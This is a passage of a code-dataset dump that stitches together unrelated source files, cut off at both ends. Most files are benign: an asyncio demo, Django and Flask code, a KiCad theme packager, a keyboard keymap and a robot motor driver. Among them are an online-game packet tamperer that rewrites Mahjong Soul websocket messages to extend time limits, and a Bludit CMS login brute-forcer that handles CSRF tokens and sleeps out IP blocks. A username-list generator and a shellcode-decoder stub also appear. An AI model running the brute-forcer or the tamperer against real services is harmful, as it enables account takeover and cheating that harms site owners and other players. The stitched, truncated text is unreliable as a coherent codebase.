self.res_type[msg_id] = (method_name, getattr(
pb, proto_domain['responseType'])) # wait response
elif msg_type == MsgType.Res:
assert(len(msg_block[0]['data']) == 0)
assert(msg_id in self.res_type)
method_name, liqi_pb2_res = self.res_type.pop(msg_id)
proto_obj = liqi_pb2_res.FromString(msg_block[1]['data'])
dict_obj = MessageToDict(proto_obj)
result = {'id': msg_id, 'type': msg_type,
'method': method_name, 'data': dict_obj}
self.tot += 1
return result
def tamperUsetime(flow_msg) -> bool:
"""
If flow_msg is a '.lq.FastTest.inputOperation' and
have a 'timeuse' domain, change it to a random number in 1-4
for extending the time limit of the server to the client.
Return whether the data has been tampered.
"""
def getById(A, id):
for d in A:
if d['id'] == id:
return d
return None
buf = flow_msg.content
from_client = flow_msg.from_client
result = dict()
    msg_type = MsgType(buf[0])  # packet message type
if msg_type == MsgType.Notify:
        L0 = fromProtobuf(buf[1:])  # parse the remaining packet structure
assert(toProtobuf(L0) == buf[1:])
method_name = L0[0]['data'].decode()
if method_name == '.lq.ActionPrototype':
_, lq, message_name = method_name.split('.')
liqi_pb2_notify = getattr(pb, message_name)
L1 = fromProtobuf(L0[1]['data'])
assert(toProtobuf(L1) == L0[1]['data'])
action_name = L1[1]['data'].decode()
if action_name == 'ActionDealTile':
L2 = fromProtobuf(L1[2]['data'])
assert(toProtobuf(L2) == L1[2]['data'])
d3 = getById(L2, 4)
                if d3 is not None:
L3 = fromProtobuf(d3['data'])
                    if getById(L3, 5) is not None:
d4 = getById(L3, 4)
                        if d4 is not None:
x = 1+L0[1]['begin']+2+L1[2]['begin'] + \
2+d3['begin']+2+d4['begin']+1
old_value, p = parseVarint(buf, x)
if old_value < 20000:
d4['data'] = 20000
else:
old_value = 0
L3.append(
{'id': 4, 'type': 'varint', 'data': 20000})
L3 = sorted(L3, key=lambda x: x['id'])
print('[TamperTimeAdd] from', old_value, 'to', 20000)
d3['data'] = toProtobuf(L3)
L1[2]['data'] = toProtobuf(L2)
L0[1]['data'] = toProtobuf(L1)
flow_msg.content = buf[0:1]+toProtobuf(L0)
return True
elif msg_type == MsgType.Req:
msg_id = struct.unpack('<H', buf[1:3])[0]
msg_block = fromProtobuf(buf[3:])
method_name = msg_block[0]['data'].decode()
if method_name == '.lq.FastTest.inputOperation':
data_block = fromProtobuf(msg_block[1]['data'])
x = None
for d in data_block:
if d['id'] == 6:
x = 3+msg_block[1]['begin']+2+d['begin']+1
            if x is None or buf[x] < 5:
return False
new_usetime = int(random.randint(1, 4)).to_bytes(1, 'little')
print('[TamperUseTime] from', int(buf[x]), 'to', new_usetime)
flow_msg.content = buf[:x]+new_usetime+buf[x+1:]
return True
return False
def toVarint(x: int) -> bytes:
data = 0
base = 0
length = 0
if x == 0:
return b'\x00'
while(x > 0):
length += 1
data += (x & 127) << base
x >>= 7
if x > 0:
data += 1 << (base+7)
base += 8
return data.to_bytes(length, 'little')
def parseVarint(buf, p):
# parse a varint from protobuf
data = 0
base = 0
while(p < len(buf)):
data += (buf[p] & 127) << base
base += 7
p += 1
if buf[p-1] >> 7 == 0:
break
return (data, p)
def fromProtobuf(buf) -> List[Dict]:
"""
    Dump the structure of a protobuf buffer to inspect the packet layout.
buf: protobuf bytes
"""
p = 0
result = []
while(p < len(buf)):
block_begin = p
block_type = (buf[p] & 7)
block_id = buf[p] >> 3
p += 1
if block_type == 0:
#varint
block_type = 'varint'
data, p = parseVarint(buf, p)
elif block_type == 2:
#string
block_type = 'string'
s_len, p = parseVarint(buf, p)
data = buf[p:p+s_len]
p += s_len
else:
            raise Exception('unknown type:', block_type, ' at', p)
result.append({'id': block_id, 'type': block_type,
'data': data, 'begin': block_begin})
return result
def toProtobuf(data: List[Dict]) -> bytes:
"""
Inverse operation of 'fromProtobuf'
"""
result = b''
for d in data:
if d['type'] == 'varint':
result += ((d['id'] << 3)+0).to_bytes(length=1, byteorder='little')
result += toVarint(d['data'])
elif d['type'] == 'string':
result += ((d['id'] << 3)+2).to_bytes(length=1, byteorder='little')
result += toVarint(len(d['data']))
result += d['data']
else:
raise NotImplementedError
return result
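# --- Illustrative self-check added for clarity (hypothetical, not part of the original module) ---
# toVarint/parseVarint implement the standard protobuf varint (7 payload bits per byte,
# little-endian, high bit set on every byte except the last), and fromProtobuf/toProtobuf
# round-trip a flat list of {id, type, data} field blocks.
def _demo_wire_format():
    """Small self-check of the wire-format helpers above; call manually if desired."""
    assert toVarint(300) == b'\xac\x02'             # 300 encodes to AC 02
    assert parseVarint(b'\xac\x02', 0) == (300, 2)  # and decodes back, ending at offset 2
    buf = b'\x0a\x09.lq.Lobby'                      # field 1, wire type 2 (length-delimited)
    assert toProtobuf(fromProtobuf(buf)) == buf     # decode/encode round-trip is lossless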
def dumpWebSocket(filename='ws_dump.pkl'):
    server = ServerProxy("http://127.0.0.1:37247")  # initialize the RPC server proxy
liqi = LiqiProto()
tot = 0
history_msg = []
while True:
n = server.get_len()
if tot < n:
flow = pickle.loads(server.get_items(tot, n).data)
for flow_msg in flow:
result = liqi.parse(flow_msg)
print(result)
print('-'*65)
#packet = flow_msg.content
#from_client = flow_msg.from_client
#print("[" + ("Sended" if from_client else "Reveived") +
# "]: decode the packet here: %r…" % packet)
tot += 1
history_msg = history_msg+flow
path = filename
pickle.dump(history_msg, open(path, 'wb'))
time.sleep(0.2)
def replayWebSocket(filename='ws_dump.pkl'):
path = filename
history_msg = pickle.load(open(path, 'rb'))
liqi = LiqiProto()
for flow_msg in history_msg:
result = liqi.parse(flow_msg)
print(result)
print('-'*65)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Demo of Liqi Proto")
parser.add_argument('-d', '--dump', default='')
parser.add_argument('-l', '--load', default='')
args = parser.parse_args()
if args.dump != '':
dumpWebSocket(args.dump)
elif args.load != '':
replayWebSocket(args.load)
else:
print('Instruction not supported.')
print('Use "python -m majsoul_wrapper.liqi --dump FILE"')
print(' or "python -m majsoul_wrapper.liqi --load FILE"')
``` |
{
"source": "74gigi8/Learning-Path-Learn-Web-Development-with-Python",
"score": 3
} |
#### File: src/extras/coroutine.py
```python
import asyncio
async def sleeper_coroutine():
await asyncio.sleep(5)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(sleeper_coroutine())
```
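The coroutine above is driven through an explicitly created event loop. On Python 3.7 and later the same thing is usually written with `asyncio.run`, which creates and closes the loop for you; a minimal equivalent sketch:
```python
import asyncio

async def sleeper_coroutine():
    await asyncio.sleep(5)

if __name__ == '__main__':
    # asyncio.run sets up an event loop, runs the coroutine to completion, and closes the loop
    asyncio.run(sleeper_coroutine())
```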
#### File: src/formschapter/models.py
```python
from django.db import models
from django.urls import reverse
class ImportantDate(models.Model):
date = models.DateField()
desc = models.CharField(max_length=100)
def __str__(self):
return "{} - {}".format(self.date, self.desc)
def get_absolute_url(self):
return reverse('formschapter:impdate_detail', args=[str(self.pk)])
class Meta:
ordering = ('-date',)
```
#### File: src/viewschapter/mro.py
```python
class A:
def do(self):
print("A")
class B:
def do(self):
print("B")
class BA(B, A):
pass
class AB(A, B):
pass
BA().do() # Prints B
AB().do() # Prints A
print(AB.__mro__)
```
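Since `__mro__` is also the order in which cooperative `super()` calls are resolved, a small illustrative sketch (not from the book's sources) makes the link explicit:
```python
class A:
    def do(self):
        print("A")

class B(A):
    def do(self):
        print("B")
        super().do()  # delegates to the next class in B.__mro__, which is A

B().do()          # prints "B" then "A"
print(B.__mro__)  # (<class 'B'>, <class 'A'>, <class 'object'>)
```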
#### File: src/viewschapter/serializers.py
```python
from rest_framework import serializers
from posts import models
class PostSerializer(serializers.ModelSerializer):
posted_by = serializers.SerializerMethodField()
def get_posted_by(self, obj):
return obj.posted_by.username
class Meta:
model = models.Post
fields = ("posted_by", "message",)
``` |
{
"source": "74ls04/StackMod",
"score": 3
} |
#### File: python/src/StackModIO.py
```python
from __future__ import division
import logging
import time
import math
import sys
log = logging.getLogger(__name__)
I2C_MASTER_ADDRESS = 0x70
START = '{'
END = '}'
MOTOR = 0x32
exponential_deadband = .25
exponential_sensitivity = 1
class StackModIO(object):
"""Modbot Protocol Python Implementation"""
smoothing_size = 10
x_array = [0]*smoothing_size
x_index = 0
x_total = 0
x_average = 0
y_array = [0]*smoothing_size
y_index = 0
y_total = 0
y_average = 0
def __init__(self, address, i2c=None, **kwargs):
# Setup I2C interface for the device.
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
self._device = i2c.get_i2c_device(address, **kwargs)
self.address = address
def joystick_to_diff(self, x, y, minJoystick, maxJoystick, minSpeed, maxSpeed):
# If x and y are 0, then there is not much to calculate...
if x == 0 and y == 0:
return (0, 0)
# First Compute the angle in deg
# First hypotenuse
z = math.sqrt(x * x + y * y)
# angle in radians
rad = math.acos(math.fabs(x) / z)
# and in degrees
angle = rad * 180 / math.pi
        # The angle now indicates the amount of turn.
        # Along a straight line the turn coefficient is the same for a given angle;
        # for angles between 0 and 90 degrees, an angle of 0 gives a coefficient of -1,
        # 45 degrees gives 0, and 90 degrees gives 1.
tcoeff = -1 + (angle / 90) * 2
turn = tcoeff * math.fabs(math.fabs(y) - math.fabs(x))
turn = round(turn * 100, 0) / 100
# And max of y or x is the movement
mov = max(math.fabs(y), math.fabs(x))
# First and third quadrant
if (x >= 0 and y >= 0) or (x < 0 and y < 0):
rawLeft = mov
rawRight = turn
else:
rawRight = mov
rawLeft = turn
# Reverse polarity
if y < 0:
rawLeft = 0 - rawLeft
rawRight = 0 - rawRight
# minJoystick, maxJoystick, minSpeed, maxSpeed
        # Map the values onto the defined range
rightOut = self.map(rawRight, minJoystick, maxJoystick, minSpeed, maxSpeed)
leftOut = self.map(rawLeft, minJoystick, maxJoystick, minSpeed, maxSpeed)
return int(rightOut), int(leftOut)
@staticmethod
def map(v, in_min, in_max, out_min, out_max):
# Check that the value is at least in_min
if v < in_min:
v = in_min
# Check that the value is at most in_max
if v > in_max:
v = in_max
return (v - in_min) * (out_max - out_min) // (in_max - in_min) + out_min
@staticmethod
def map_values(value, left_min, left_max, right_min, right_max):
"""
Maps values from one range to another
:param value:
:param left_min:
:param left_max:
:param right_min:
:param right_max:
:return:
"""
# Figure out how 'wide' each range is
left_span = left_max - left_min
right_span = right_max - right_min
value_scaled = float(value - left_min) / float(left_span) # Convert the left range into a 0-1 range (float)
return right_min + (value_scaled * right_span) # Convert the 0-1 range into a value in the right range.
def mix_x_y(self, in_x, in_y):
"""
        Converts X,Y values to L,R differential steering values
:param in_x:
:param in_y:
:return:
"""
x = in_x
y = in_y
# self.x_total = self.x_total - self.x_array[self.x_index]
# self.x_array[self.x_index] = in_x
# self.x_total = self.x_total + self.x_array[self.x_index]
# self.x_index = self.x_index + 1
#
# if self.x_index >= self.smoothing_size:
# self.x_index = 0
#
# x = self.x_total / self.smoothing_size
#
# self.y_total = self.y_total - self.y_array[self.y_index]
# self.y_array[self.y_index] = in_y
# self.y_total = self.y_total + self.y_array[self.y_index]
# self.y_index = self.y_index + 1
#
# if self.y_index >= self.smoothing_size:
# self.y_index = 0
#
# y = self.y_total / self.smoothing_size
x = self.exponential_filter(.23, in_x, 1)
y = self.exponential_filter(.23, in_y, 1)
#
# convert to polar
r = math.hypot(x, y)
t = math.atan2(y, x)
# rotate by 45 degrees
t += math.pi / 4
# back to cartesian
left = r * math.cos(t)
right = r * math.sin(t)
# rescale the new coords
left = left * math.sqrt(2)
right = right * math.sqrt(2)
# clamp to -1/+1
left = max(-1, min(left, 1))
right = max(-1, min(right, 1))
# if (left < 0 and right > 0) or (left > 0 and right < 0):
# left = self.exponential_filter(.23, left, 1)
# right = self.exponential_filter(.23, right, 1)
# else:
# left = self.exponential_filter(exponential_deadband, left, exponential_sensitivity)
# right = self.exponential_filter(exponential_deadband, right, exponential_sensitivity)
# x = -x
# v = (1 - abs(x)) * (y/1) + y
# w = (1 - abs(y)) * (x/1) + x
# left = (v - w) / 2
# right = (v + w) / 2
return int(self.map_values(left, -1, 1, -255, 255)), int(self.map_values(right, -1, 1, -255, 255))
@staticmethod
def exponential_filter(deadband, value, sensitivity):
"""
Exponential response for a joystick input in the range -1 - 1
A sensitivity of 0 gives a linear response and a sensitivity of 1 gives a steep exponential curve
        The inverse deadband or slope is the minimum value at which an input causes the motor to move
f(x)=.2+(1-.2)*(x)
f(x)=-.2+(1-.2)*(x)
f(x)=.2+(1-.2)*(x^3)
f(x)=-.2+(1-.2)*(x^3)
Credit to this thread: https://www.chiefdelphi.com/forums/showthread.php?t=88065
:param deadband:
:param value:
:param sensitivity:
:return:
"""
if value > 0:
return deadband + (1 - deadband) * (sensitivity * math.pow(value, 4) + (1 - sensitivity) * value)
elif value == 0:
return 0
else:
return -deadband + (1 - deadband) * (sensitivity * math.pow(value, 4) + (1 - sensitivity) * value)
@staticmethod
def exponential_moving_average(curr_sum, new_value):
"""
https://stackoverflow.com/questions/10990618/calculate-rolling-moving-average-in-c#10990656
:param curr_sum:
:param new_value:
:return:
"""
# alpha = .3
# (1 - .3) = .7
        return 0 if new_value == 0 else (.3 * new_value) + .7 * curr_sum
@staticmethod
def _calculate_checksum(packet):
"""
:param packet:
:return:
"""
checksum = 0
for c in packet:
if (c != START) and (c != END):
try:
checksum += c - 32
except TypeError:
checksum += ord(c) - 32
return (checksum % 95) + 32
def set_motor(self, motor, value):
"""
:param motor:
:param value:
:return:
"""
packet = [START, self.address, I2C_MASTER_ADDRESS, '$', 'M', 'T', 'R', str(motor)]
val = list(str(abs(value)).zfill(3))
if value < 0:
packet.append('-')
else:
packet.append('+')
packet = packet + val
packet.append(END)
packet.append(self._calculate_checksum(packet))
log.debug(packet)
try:
self._device.writeList(MOTOR, packet)
        except Exception as e:
            log.error("Send Error: %s" % e)
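# --- Hypothetical usage sketch added for illustration; no I2C hardware is required ---
# The pure-math helpers are static methods, so they can be exercised directly:
if __name__ == '__main__':
    print(StackModIO.map(512, 0, 1023, -255, 255))     # rescale an ADC-style reading
    print(StackModIO.exponential_filter(.25, 0.5, 1))  # soften a mid-stick joystick value
    print(StackModIO._calculate_checksum(['{', 0x70, 0x71, '$', 'M', 'T', 'R', '}']))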
``` |
{
"source": "74th/kicad-highcontrast-monokai-theme",
"score": 2
} |
#### File: 74th/kicad-highcontrast-monokai-theme/create_repository.py
```python
import datetime
import hashlib
import json
import zipfile
from pathlib import Path
from zipfile import ZipFile
ROOT_PATH = Path(__file__).resolve().parent
PACKAGES_JSON_PATH = ROOT_PATH / "packages.json"
RESOURCES_PATH = ROOT_PATH / "resources.zip"
REPOSITORY_JSON_PATH = ROOT_PATH / "repository.json"
METADATA_FILEAME = "metadata.json"
ICON_FILENAME = "icon.png"
REPOSITORY_BASE_URI = "https://raw.githubusercontent.com/74th/kicad-highcontrast-monokai-theme/master"
READ_SIZE = 65536
def sha256_of_file(path):
file_hash = hashlib.sha256()
with path.open("rb") as f:
data = f.read(READ_SIZE)
while data:
file_hash.update(data)
data = f.read(READ_SIZE)
return file_hash.hexdigest()
def create_pcm_from_color_scheme(path, resulting_file):
with ZipFile(resulting_file, 'w', compression=zipfile.ZIP_DEFLATED) as zip:
for json_file in path.glob("*.json"):
if json_file.name == METADATA_FILEAME:
zip.write(json_file, json_file.name)
continue
zip.write(json_file, f"colors/{json_file.name}")
icon_file = path / ICON_FILENAME
if icon_file.exists():
zip.write(icon_file, f"resources/{ICON_FILENAME}")
def install_size_of_zip(zip_path):
install_size = 0
with ZipFile(zip_path, 'r') as zip:
for file in zip.filelist:
install_size += zip.getinfo(file.filename).file_size
return install_size
def create_and_get_pcm(path):
metadata_path = path / METADATA_FILEAME
if not metadata_path.exists():
return
print(f"* create schema for: {path}")
with metadata_path.open("rb") as f:
metadata_json = json.load(f)
identifier = metadata_json["identifier"]
for metadata_version in metadata_json["versions"]:
version = metadata_version['version']
pkg_name = f"{identifier}_v{version}_pcm.zip"
pkg_path = path / pkg_name
if not pkg_path.exists():
# create new package as it does not exist yet (new version)
print(f" * create package: {pkg_path}")
create_pcm_from_color_scheme(path, pkg_path)
# fill in package data
metadata_version['download_sha256'] = sha256_of_file(pkg_path)
metadata_version['download_size'] = pkg_path.stat().st_size
metadata_version['download_url'] = f"{REPOSITORY_BASE_URI}/{path.name}/{pkg_name}"
metadata_version['install_size'] = install_size_of_zip(pkg_path)
return metadata_json
def write_packages_json(package_array):
packages_data = {"packages": package_array}
with PACKAGES_JSON_PATH.open("w", encoding="utf-8") as f:
json.dump(packages_data, f, indent=4)
def write_resources_zip():
with ZipFile(RESOURCES_PATH, 'w', compression=zipfile.ZIP_DEFLATED) as zip:
for path in ROOT_PATH.iterdir():
if not path.is_dir():
continue
metadata_path = path / METADATA_FILEAME
icon_path = path / ICON_FILENAME
if not metadata_path.exists() or not icon_path.exists():
continue
with metadata_path.open("r") as f:
metadata_json = json.load(f)
identifier = metadata_json["identifier"]
zip.write(icon_path, f"{identifier}/{ICON_FILENAME}")
def write_repository_json():
packages_json_sha256 = sha256_of_file(PACKAGES_JSON_PATH)
packages_json_update_timestamp = int(PACKAGES_JSON_PATH.stat().st_mtime)
packages_json_update_time_utc = datetime.datetime.fromtimestamp(packages_json_update_timestamp, tz=datetime.timezone.utc)
repository_data = {
"$schema": "https://go.kicad.org/pcm/schemas/v1#/definitions/Repository",
"maintainer": {
"contact": {
"web": "https://github.com/74th/kicad-highcontrast-monokai-theme/"
},
"name": "<NAME> (@74th)"
},
"name": "kicad high contrast monokai schema by @74th",
"packages": {
"sha256": packages_json_sha256,
"update_time_utc": packages_json_update_time_utc.strftime("%Y-%m-%d %H:%M:%S"),
"update_timestamp": packages_json_update_timestamp,
"url": f"{REPOSITORY_BASE_URI}/packages.json"
}
}
if RESOURCES_PATH.exists():
resources_sha256 = sha256_of_file(RESOURCES_PATH)
resources_update_timestamp = int(RESOURCES_PATH.stat().st_mtime)
resources_update_time_utc = datetime.datetime.fromtimestamp(resources_update_timestamp, tz=datetime.timezone.utc)
repository_data["resources"] = {
"sha256": resources_sha256,
"update_time_utc": resources_update_time_utc.strftime("%Y-%m-%d %H:%M:%S"),
"update_timestamp": resources_update_timestamp,
"url": f"{REPOSITORY_BASE_URI}/resources.zip"
}
with REPOSITORY_JSON_PATH.open("w", encoding="utf-8") as f:
json.dump(repository_data, f, indent=4)
if __name__ == "__main__":
# create all package zip files and return the full schema of each one
schemas = []
for path in ROOT_PATH.iterdir():
if path.is_dir():
schema = create_and_get_pcm(path)
if schema:
schemas.append(schema)
schemas = sorted(schemas, key=lambda d: d['identifier'])
# write packages.json and repository.json
write_packages_json(schemas)
write_resources_zip()
write_repository_json()
``` |
{
"source": "74th/NumAtreus-kmk",
"score": 2
} |
#### File: 74th/NumAtreus-kmk/keymap.py
```python
from kmk.keys import KC
quary_layer = 0
lower_layer = 1
raise_layer = 2
____ = KC.TRANSPARENT
def query_keymap():
raise_m = KC.MO(lower_layer)
lower_m = KC.MO(raise_layer)
"""
Q W E R T || Y U I O P
A S D F G || H J K L ;
Z X C V B || N M , . /
SFT TAB CTL LW space bksp||ALT Ent RS - ' =
"""
left = [
[KC.Q, KC.W, KC.E, KC.R, KC.T],
[KC.A, KC.S, KC.D, KC.F, KC.G],
[KC.Z, KC.X, KC.C, KC.V, KC.B],
[KC.LSFT, KC.TAB, KC.LCTL, lower_m, KC.SPC, KC.BSPC],
]
right = [
[ KC.Y, KC.U, KC.I, KC.O, KC.P],
[ KC.H, KC.J, KC.K, KC.L, KC.SCLN],
[ KC.N, KC.M, KC.COMM, KC.DOT, KC.SLSH],
[KC.LALT, KC.ENT, raise_m, KC.MINS, KC.QUOT, KC.PEQL],
]
return [left, right]
def lower_keymap():
"""
1 2 3 4 5 || 6 7 8 9 0
F1 F2 F3 F4 F5 || F6 F7 F8 F9 F10
F11 F12 ( ) & || ` [ ] + \
lower insert super shift space bksp|| alt Ent fn . - =
"""
left = [
[KC.EXLM, KC.AT, KC.HASH, KC.DLR, KC.PERC],
[KC.DEL, KC.ESC, ____, ____, ____],
[KC.CAPS, KC.VOLU, ____, KC.ENT, ____],
[____, KC.VOLD, KC.LGUI, KC.LSFT, KC.SPC, KC.BSPC],
]
right = [
[ KC.CIRC, KC.AMPR, KC.ASTR, KC.LPRN, KC.RPRN],
[ KC.PGDN, KC.PGUP, KC.PSCR, ____, ____],
[ ____, ____, ____, KC.UP, ____],
[KC.LALT, KC.ENT, ____, KC.LEFT, KC.DOWN, KC.RGHT],
]
return [left, right]
def raise_keymap():
"""
! @ # $ % || ^ & * ( )
DEL ESC || PGDN PGUP PSCR
CAPS volup ENT reset || UP
voldn super shift space bspc|| alt ent LEFT DOWN RGHT
"""
left = [
[KC.N1, KC.N2, KC.N3, KC.N4, KC.N5],
[KC.F1, KC.F2, KC.F3, KC.F4, KC.F5],
[KC.F11, KC.F12, KC.LPRN, KC.RPRN, KC.AMPR],
[KC.NO, KC.INS, KC.LGUI, KC.LSFT, KC.SPC, KC.BSPC],
]
right = [
[ KC.N6, KC.N7, KC.N8, KC.N9, KC.N0],
[ KC.F6, KC.F7, KC.F8, KC.F9, KC.F10],
[ KC.GRV, KC.LBRC, KC.RBRC, KC.PSLS, KC.BSLS],
[KC.LALT, KC.ENT, KC.TRNS, KC.DOT, KC.PMNS, KC.EQL],
]
return [left, right]
def get_keymap():
return [
query_keymap(),
lower_keymap(),
raise_keymap(),
]
``` |
{
"source": "74th/settingsjson-py",
"score": 3
} |
#### File: settingsjson-py/settingsjson/settingsjson.py
```python
import os
import json
def get(filename=".settings.json", basepath=None):
"""get and parse .settings.json(or setted filename) from current(or basepath) and parrent directories"""
    if basepath is None:
path = os.getcwd()
else:
path = os.path.abspath(basepath)
while True:
filepath = os.path.join(path, filename)
if os.path.exists(filepath):
f = open(filepath, 'r')
d = json.load(f)
f.close()
return d
before_path = path
path = os.path.abspath(os.path.join(path, os.pardir))
if not os.path.exists(path) or path == before_path:
            if basepath is None:
raise Exception("not found {0}".format(filename))
else:
raise Exception("not found {0} in {1}".format(filename, basepath))
``` |
{
"source": "74th/vscode-book-python",
"score": 3
} |
#### File: vscode-book-python/server/api.py
```python
import json
import flask
from model import tasks
app = flask.Flask(__name__)
rep = tasks.Repository()
@app.route("/api/tasks", methods=["GET"])
def list_tasks():
task_list = rep.list()
return tasks.serialize_tasks(task_list)
@app.route("/api/tasks", methods=["POST"])
def create_task():
task = tasks.deserialize_task(flask.request.data)
id = rep.add(task)
return json.dumps({"id":id})
@app.route("/api/tasks/<int:id>/done", methods=["POST"])
def done_tasks(id: int):
rep.done(id)
return ""
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8080)
```
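A quick way to exercise these routes without starting a server is Flask's built-in test client. The sketch below assumes the file is importable as `api` and only touches the read-only and `done` endpoints:
```python
from api import app

client = app.test_client()                              # in-process WSGI client
print(client.get("/api/tasks").get_data(as_text=True))  # serialized list of open tasks
client.post("/api/tasks/1/done")                        # mark task 1 as done
print(client.get("/api/tasks").get_data(as_text=True))  # task 1 is no longer listed
```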
#### File: model/tasks/repository.py
```python
from typing import List
from .tasks import Task
class Repository:
def __init__(self):
self._tasks: List[Task] = [Task(1, "task1", False), Task(2, "task2", False)]
def list(self) -> List[Task]:
return list(filter(lambda t: not t.done, self._tasks))
def add(self, task: Task) -> int:
task.id = len(self._tasks) + 1
self._tasks.append(task)
return task.id
def done(self, id: int):
for t in self._tasks:
if t.id == id:
t.done = True
``` |
{
"source": "74wny0wl/Alpha2-decoder",
"score": 3
} |
#### File: Alpha2-decoder/utils/argparsers.py
```python
import argparse
def create_args_parser():
parser = argparse.ArgumentParser(description='Decoder for shellcodes generated with Alpha2-encoder')
parser.add_argument('-u', action='store_true', help='unicode shellcode')
parser.add_argument('-v', action='version', version='%(prog)s 1.0.0')
return parser
``` |
{
"source": "74wny0wl/bluditcracker",
"score": 3
} |
#### File: bluditcracker/bludit/credentials.py
```python
import itertools
import os
import logging
class BluditCredentialsFactory:
def __init__(self):
self.csrf_token = None
def use_csrf_token(self, csrf_token):
self.csrf_token = csrf_token
def create_credentials(self, username, password):
credentials = {'tokenCSRF': self.csrf_token, 'username': username, 'password': password, 'save': ''}
return credentials
def __load_file_lines__(filename):
lines = []
if not os.path.isfile(filename):
logging.getLogger().error('File path {} does not exist'.format(filename))
else:
with open(filename, 'r') as f:
lines = f.readlines()
lines = [line.strip() for line in lines]
return lines
def load_usernames(filename):
return __load_file_lines__(filename)
def load_passwords(filename):
return __load_file_lines__(filename)
def build_credentials_wordlist(usernames, passwords):
return list(itertools.product(usernames, passwords))
```
#### File: bluditcracker/bludit/httpclient.py
```python
from http import HTTPStatus
import requests
import validators
from validators import ValidationFailure
from bludit.utils import get_bludit_key, get_csrf_token
import logging
class IPAddressBlockedError(Exception):
pass
class BluditHttpClient:
def __init__(self, bludit_credentials_factory):
self.bludit_credentials_factory = bludit_credentials_factory
self.admin_panel_url = None
self.is_connected = False
self.csrf_token = None
self.cookies = None
def connect(self, admin_panel_url):
self.admin_panel_url = admin_panel_url
self.reconnect()
def reconnect(self):
if not self.is_admin_panel_url_valid():
return
self.is_connected = False
response = requests.get(self.admin_panel_url)
if response.status_code == HTTPStatus.OK:
bludit_key = get_bludit_key(response)
self.csrf_token = get_csrf_token(response)
self.cookies = {'BLUDIT-KEY': bludit_key}
self.bludit_credentials_factory.use_csrf_token(self.csrf_token)
self.is_connected = True
return self.is_connected
    def is_admin_panel_url_valid(self):
        # validators.url returns a falsy ValidationFailure object rather than raising,
        # so the result has to be checked instead of caught
        is_valid = bool(validators.url(self.admin_panel_url))
        if not is_valid:
            logging.getLogger().error("Admin panel URL is not valid")
        return is_valid
def try_authenticate(self, username, password):
credentials = self.bludit_credentials_factory.create_credentials(username, password)
authenticate_response = requests.post(self.admin_panel_url, cookies=self.cookies, data=credentials)
if 'IP address has been blocked' in authenticate_response.text:
raise IPAddressBlockedError
return 'HTML_PATH_ADMIN_ROOT' in authenticate_response.text
```
#### File: bluditcracker/utils/argparsers.py
```python
import argparse
def create_args_parser():
parser = argparse.ArgumentParser(description='Password cracking tool that can be used to recover credentials to Bludit CMS')
maingroup = parser.add_argument_group(title='required')
maingroup.add_argument('-t', nargs='?', help='target, ex.: http://10.10.10.99', metavar='url', required=True)
maingroup.add_argument('-d', nargs='?', help='admin panel dir, default: /admin/login', metavar='dir',
default='/admin/login')
usernames_group = maingroup.add_mutually_exclusive_group(required=True)
usernames_group.add_argument('-u', nargs='?', help='username', metavar='username')
usernames_group.add_argument('-U', nargs='?', help='usernames wordlist file', metavar='filename')
passwords_group = maingroup.add_mutually_exclusive_group(required=True)
passwords_group.add_argument('-p', nargs='?', help='password', metavar='password')
passwords_group.add_argument('-P', nargs='?', help='passwords wordlist file', metavar='filename')
parser.add_argument('-s', nargs='?', help='sleep time after blocking IP', metavar='time in seconds', default=60)
parser.add_argument('-v', action='version', version='%(prog)s 1.0.1')
return parser
``` |
{
"source": "74wny0wl/entusergenerator",
"score": 3
} |
#### File: 74wny0wl/entusergenerator/entusergenerator.py
```python
import logging
import os
import usernamerules
import utils.argparsers as argparsers
DEFAULT_RULE_NAMES = ['simple', 'surname', 'name', 'partial_name_and_surname', 'name_and_partial_surname']
def __apply(rule_names, with_user_data, with_separator):
usernames = set()
for rule_name in rule_names:
rule = getattr(usernamerules, rule_name)
usernames.update(rule(with_user_data, with_separator))
return usernames
def __produce_usernames_without_changes(for_users, rule_names, separator=''):
no_changes_usernames = set()
for user in for_users:
user_data = user.split()
no_changes_usernames.update(__apply(rule_names, user_data, separator))
return no_changes_usernames
def __try_produce_usernames_reversed(for_users, rule_names, reverse, separator=''):
reversed_usernames = set()
if reverse:
for user in for_users:
user_data = user.split()
user_data.reverse()
reversed_usernames.update(__apply(rule_names, user_data, separator))
return reversed_usernames
def __try_produce_rule_lowercase(usernames, lowercase):
lowercase_usernames = set()
if lowercase:
lowercase_usernames = set([username.lower() for username in usernames])
return lowercase_usernames
def __try_produce_rule_uppercase(usernames, uppercase):
uppercase_usernames = set()
if uppercase:
uppercase_usernames = set([username.upper() for username in usernames])
return uppercase_usernames
def __produce_without_separators(for_users, rule_names, reverse):
usernames = set()
no_changes_usernames = __produce_usernames_without_changes(for_users, rule_names)
reversed_usernames = __try_produce_usernames_reversed(for_users, rule_names, reverse)
usernames.update(no_changes_usernames)
usernames.update(reversed_usernames)
return usernames
def __produce_with_separators(for_users, rule_names, reverse, separators):
usernames = set()
for separator in separators:
no_changes_usernames = __produce_usernames_without_changes(for_users, rule_names, separator)
reversed_usernames = __try_produce_usernames_reversed(for_users, rule_names, reverse, separator)
usernames.update(no_changes_usernames)
usernames.update(reversed_usernames)
return usernames
def get_users(from_file):
users = []
if not os.path.isfile(from_file):
logging.error("File path {} does not exist.".format(from_file))
else:
with open(from_file, "r") as f:
users = f.readlines()
users = [user.strip() for user in users]
return users
def produce_usernames(for_users, separators, rule_names=DEFAULT_RULE_NAMES, reverse=False,
lowercase=False, uppercase=False):
base_usernames = set()
base_usernames.update(__produce_without_separators(for_users, rule_names, reverse))
base_usernames.update(__produce_with_separators(for_users, rule_names, reverse, separators))
lowercase_usernames = __try_produce_rule_lowercase(base_usernames, lowercase)
uppercase_usernames = __try_produce_rule_uppercase(base_usernames, uppercase)
usernames = set()
if lowercase:
usernames.update(lowercase_usernames)
elif uppercase:
usernames.update(uppercase_usernames)
else:
usernames.update(base_usernames)
return usernames
def main():
logging.basicConfig(level=logging.INFO)
arg_parser = argparsers.create_args_parser()
script_args = arg_parser.parse_args()
logging.log(level=logging.DEBUG, msg=str(script_args))
users = get_users(script_args.i)
usernames = produce_usernames(users, separators=script_args.s, reverse=script_args.r,
lowercase=script_args.l, uppercase=script_args.u)
for username in usernames:
print(username)
if __name__ == "__main__":
main()
```
#### File: entusergenerator/usernamerules/name_and_partial_surname.py
```python
import utils.stringutils as stringutils
